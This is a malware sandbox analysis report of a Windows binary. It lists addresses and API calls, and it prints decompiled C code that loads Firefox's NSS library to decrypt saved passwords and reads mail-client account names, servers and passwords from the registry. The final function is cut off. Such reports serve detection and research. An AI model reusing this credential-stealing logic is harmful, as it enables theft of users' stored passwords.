                                                  0x0040dd0d
                                                  0x0040dd0d
                                                  0x0040dd0d
                                                  0x0040dd19
                                                  0x0040dd1f
                                                  0x0040dd29
                                                  0x0040dd37
                                                  0x0040dd3e
                                                  0x0040dd43
                                                  0x0040dd49
                                                  0x0040dd4c
                                                  0x0040dd54
                                                  0x0040dd5a
                                                  0x0040dd5f
                                                  0x0040dd67
                                                  0x0040dd7b
                                                  0x0040dd80
                                                  0x0040dd83
                                                  0x0040dd89
                                                  0x0040dd9d
                                                  0x0040dda3
                                                  0x0040dd89
                                                  0x00000000
                                                  0x0040dd21
                                                  0x0040dd21
                                                  0x0040dd27
                                                  0x0040dda4
                                                  0x0040de08
                                                  0x0040de21
                                                  0x0040de32
                                                  0x0040de38
                                                  0x0040de40
                                                  0x0040de40
                                                  0x00000000
                                                  0x0040dd27
                                                  0x0040dd1f
                                                  0x0040db57
                                                  0x0040db5d
                                                  0x0040db68
                                                  0x0040db8b
                                                  0x0040db99
                                                  0x0040dbb4
                                                  0x0040dbb8
                                                  0x0040dbc5
                                                  0x0040dbce
                                                  0x0040dbce
                                                  0x0040db8b
                                                  0x0040db68
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                  • {Unknown}, xrefs: 0040DBFB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                  • API String ID: 138940113-3474136107
                                                  • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                  • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                  • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                  • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040DEEE, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060D0(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062AD( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040DEA9();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}














                                                  0x0040deee
                                                  0x0040df08
                                                  0x0040df0f
                                                  0x0040df1b
                                                  0x0040df26
                                                  0x0040df2b
                                                  0x0040df33
                                                  0x0040df3e
                                                  0x0040df4b
                                                  0x0040df5b
                                                  0x0040df62
                                                  0x0040df6c
                                                  0x0040df7f
                                                  0x0040df88
                                                  0x0040dfa5
                                                  0x0040df8a
                                                  0x0040df9c
                                                  0x0040dfa2
                                                  0x0040dfb3
                                                  0x0040dfbb
                                                  0x0040dfbd
                                                  0x0040dfef
                                                  0x0040e005
                                                  0x0040e011
                                                  0x0040e01d
                                                  0x0040e029
                                                  0x0040e035
                                                  0x0040e041
                                                  0x0040e046
                                                  0x0040dfbf
                                                  0x0040dfcf
                                                  0x0040dfd3
                                                  0x0040dfd5
                                                  0x00000000
                                                  0x0040dfd7
                                                  0x0040dfd7
                                                  0x0040dfe7
                                                  0x0040dfeb
                                                  0x0040dfed
                                                  0x00000000
                                                  0x00000000
                                                  0x0040dfed
                                                  0x0040dfd5
                                                  0x0040dfbd
                                                  0x0040e053

                                                  APIs
                                                  • memset.MSVCRT ref: 0040DF0F
                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                  • memset.MSVCRT ref: 0040DF62
                                                  • strlen.MSVCRT ref: 0040DF6C
                                                  • strlen.MSVCRT ref: 0040DF7A
                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                  • API String ID: 1296682400-4029219660
                                                  • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                  • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                  • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                  • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402606, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 35%
                                                  			E00402606(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040EB80(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E004021D8(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040EB80(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040EB80(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040EB80(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040EB80(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}




















                                                  0x00402606
                                                  0x00402606
                                                  0x00402607
                                                  0x0040260b
                                                  0x00402614
                                                  0x0040261b
                                                  0x00402622
                                                  0x00402629
                                                  0x00402630
                                                  0x00402637
                                                  0x0040263e
                                                  0x00402645
                                                  0x0040264c
                                                  0x00402653
                                                  0x0040265a
                                                  0x00402661
                                                  0x00402668
                                                  0x0040266f
                                                  0x00402676
                                                  0x0040267d
                                                  0x00402684
                                                  0x0040268b
                                                  0x00402692
                                                  0x00402699
                                                  0x004026a0
                                                  0x004026a2
                                                  0x004026aa
                                                  0x004026ae
                                                  0x004026b6
                                                  0x004026b9
                                                  0x004026bc
                                                  0x004026c0
                                                  0x004026c5
                                                  0x004026c6
                                                  0x004026cb
                                                  0x004026d0
                                                  0x004026dc
                                                  0x004026ec
                                                  0x004026f4
                                                  0x004026f7
                                                  0x004026fd
                                                  0x00402700
                                                  0x0040270c
                                                  0x0040270d
                                                  0x00402711
                                                  0x00402714
                                                  0x00402715
                                                  0x00402720
                                                  0x00402721
                                                  0x00402726
                                                  0x00402729
                                                  0x0040272a
                                                  0x00402735
                                                  0x00402736
                                                  0x0040273b
                                                  0x0040273e
                                                  0x0040273f
                                                  0x00402744
                                                  0x0040274a
                                                  0x00402752
                                                  0x00402753
                                                  0x00402758
                                                  0x0040275b
                                                  0x0040275c
                                                  0x00402761
                                                  0x00402761
                                                  0x0040276d
                                                  0x0040277b
                                                  0x00402780
                                                  0x00402791
                                                  0x00402796
                                                  0x004027a9
                                                  0x004027af
                                                  0x004027b7
                                                  0x004027b7
                                                  0x004027bc
                                                  0x004027bd
                                                  0x004027cd

                                                  APIs
                                                  • memset.MSVCRT ref: 004026AE
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                  • strcpy.MSVCRT(?,?,?,?,?,75D6ED80,?,00000000), ref: 004026EC
                                                  • strcpy.MSVCRT(?,?), ref: 004027A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$QueryValuememset
                                                  • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                  • API String ID: 3373037483-1627711381
                                                  • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                  • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                  • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                  • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004027D0, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 118stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E004027D0(void* __fp0) {
				void* __esi;
				void* _t66;
				signed int _t92;
				void* _t95;
				intOrPtr _t109;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t121;

				_t121 = __fp0;
				_t111 = _t113 - 0x70;
				_t114 = _t113 - 0x474;
				 *(_t111 + 0x40) = "POP3 Password";
				 *(_t111 + 0x44) = "IMAP Password";
				 *(_t111 + 0x48) = "HTTP Password";
				 *(_t111 + 0x4c) = "SMTP Password";
				 *(_t111 + 0x50) = "POP3 User";
				 *(_t111 + 0x54) = "IMAP User";
				 *(_t111 + 0x58) = "HTTP User";
				 *(_t111 + 0x5c) = "SMTP User";
				 *(_t111 + 0x20) = "POP3 Server";
				 *(_t111 + 0x24) = "IMAP Server";
				 *(_t111 + 0x28) = "HTTP Server URL";
				 *(_t111 + 0x2c) = "SMTP Server";
				 *(_t111 + 0x30) = "POP3 Port";
				 *(_t111 + 0x34) = "IMAP Port";
				 *(_t111 + 0x38) = "HTTP Port";
				 *(_t111 + 0x3c) = "SMTP Port";
				 *(_t111 + 0x60) = "POP3 Use SPA";
				 *(_t111 + 0x64) = "IMAP Use SPA";
				 *(_t111 + 0x68) = "HTTPMail Use SSL";
				 *(_t111 + 0x6c) = "SMTP Use SSL";
				_t92 = 0;
				do {
					 *(_t111 - 0x60) = 0;
					memset(_t111 - 0x5f, 0, 0x7f);
					_t114 = _t114 + 0xc;
					_t100 = _t92 << 2;
					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
					if(_t66 != 0) {
						E004021D8(_t111 - 0x404);
						strcpy(_t111 - 0x1f0, _t111 - 0x60);
						_pop(_t95);
						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
						_t37 = _t92 + 1; // 0x1
						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
						if(_t92 != 3) {
							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
							_t114 = _t114 + 0xc;
						}
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
						_t109 =  *((intOrPtr*)(_t111 + 0x78));
						_t114 = _t114 + 0x18;
						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
					}
					_t92 = _t92 + 1;
				} while (_t92 < 4);
				return _t66;
			}












                                                  0x004027d0
                                                  0x004027d1
                                                  0x004027d5
                                                  0x004027de
                                                  0x004027e5
                                                  0x004027ec
                                                  0x004027f3
                                                  0x004027fa
                                                  0x00402801
                                                  0x00402808
                                                  0x0040280f
                                                  0x00402816
                                                  0x0040281d
                                                  0x00402824
                                                  0x0040282b
                                                  0x00402832
                                                  0x00402839
                                                  0x00402840
                                                  0x00402847
                                                  0x0040284e
                                                  0x00402855
                                                  0x0040285c
                                                  0x00402863
                                                  0x0040286a
                                                  0x0040286c
                                                  0x00402874
                                                  0x00402878
                                                  0x0040287d
                                                  0x00402882
                                                  0x0040288f
                                                  0x00402896
                                                  0x004028a2
                                                  0x004028b2
                                                  0x004028c1
                                                  0x004028c6
                                                  0x004028cf
                                                  0x004028d8
                                                  0x004028de
                                                  0x004028f1
                                                  0x00402904
                                                  0x0040290c
                                                  0x0040291c
                                                  0x0040292d
                                                  0x00402932
                                                  0x00402932
                                                  0x00402940
                                                  0x00402950
                                                  0x00402955
                                                  0x00402958
                                                  0x0040296d
                                                  0x00402980
                                                  0x0040298e
                                                  0x0040298e
                                                  0x00402993
                                                  0x00402994
                                                  0x004029a4

                                                  APIs
                                                  • memset.MSVCRT ref: 00402878
                                                    • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                  • strcpy.MSVCRT(?,?,75D6ED80,?,00000000), ref: 004028B2
                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,75D6ED80,?,00000000), ref: 00402980
                                                    • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                  • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                  • API String ID: 2416467034-4086712241
                                                  • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                  • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                  • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                  • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F435, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 81%
                                                  			E0040F435(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040EC05(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}



























                                                  0x0040f449
                                                  0x0040f453
                                                  0x0040f459
                                                  0x0040f46b
                                                  0x0040f471
                                                  0x0040f484
                                                  0x0040f486
                                                  0x0040f48b
                                                  0x0040f490
                                                  0x0040f5e6
                                                  0x0040f5ee
                                                  0x0040f5f7
                                                  0x0040f600
                                                  0x0040f60e
                                                  0x0040f610
                                                  0x0040f610
                                                  0x0040f614
                                                  0x0040f616
                                                  0x0040f623
                                                  0x0040f625
                                                  0x0040f625
                                                  0x0040f629
                                                  0x0040f62d
                                                  0x0040f63b
                                                  0x0040f63d
                                                  0x0040f63d
                                                  0x0040f63b
                                                  0x0040f629
                                                  0x0040f614
                                                  0x0040f64a
                                                  0x0040f496
                                                  0x0040f4a3
                                                  0x0040f4a9
                                                  0x0040f4b9
                                                  0x0040f4bc
                                                  0x0040f4c1
                                                  0x0040f5d5
                                                  0x0040f4c9
                                                  0x0040f4cb
                                                  0x0040f4d1
                                                  0x0040f4d6
                                                  0x0040f4d7
                                                  0x0040f4dc
                                                  0x0040f4e1
                                                  0x0040f4f0
                                                  0x0040f4f6
                                                  0x0040f508
                                                  0x0040f50e
                                                  0x0040f519
                                                  0x0040f51a
                                                  0x0040f525
                                                  0x0040f52a
                                                  0x0040f52b
                                                  0x0040f547
                                                  0x0040f54c
                                                  0x0040f552
                                                  0x0040f554
                                                  0x0040f555
                                                  0x0040f55a
                                                  0x0040f55f
                                                  0x0040f561
                                                  0x0040f561
                                                  0x0040f569
                                                  0x0040f581
                                                  0x0040f582
                                                  0x0040f589
                                                  0x0040f591
                                                  0x0040f592
                                                  0x0040f5a2
                                                  0x0040f5b5
                                                  0x0040f5ba
                                                  0x0040f5ba
                                                  0x0040f592
                                                  0x0040f569
                                                  0x0040f5bd
                                                  0x0040f5cd
                                                  0x0040f5d2
                                                  0x0040f5d2
                                                  0x0040f5e0
                                                  0x00000000
                                                  0x0040f5e0

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F459
                                                  • memset.MSVCRT ref: 0040F471
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 0040F4A9
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                  • memset.MSVCRT ref: 0040F4F6
                                                  • memset.MSVCRT ref: 0040F50E
                                                  • _snprintf.MSVCRT ref: 0040F52B
                                                  • _mbsrchr.MSVCRT ref: 0040F555
                                                  • _mbsicmp.MSVCRT ref: 0040F589
                                                  • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                  • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                  • API String ID: 3269028891-3267283505
                                                  • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                  • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                  • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                  • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F126, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
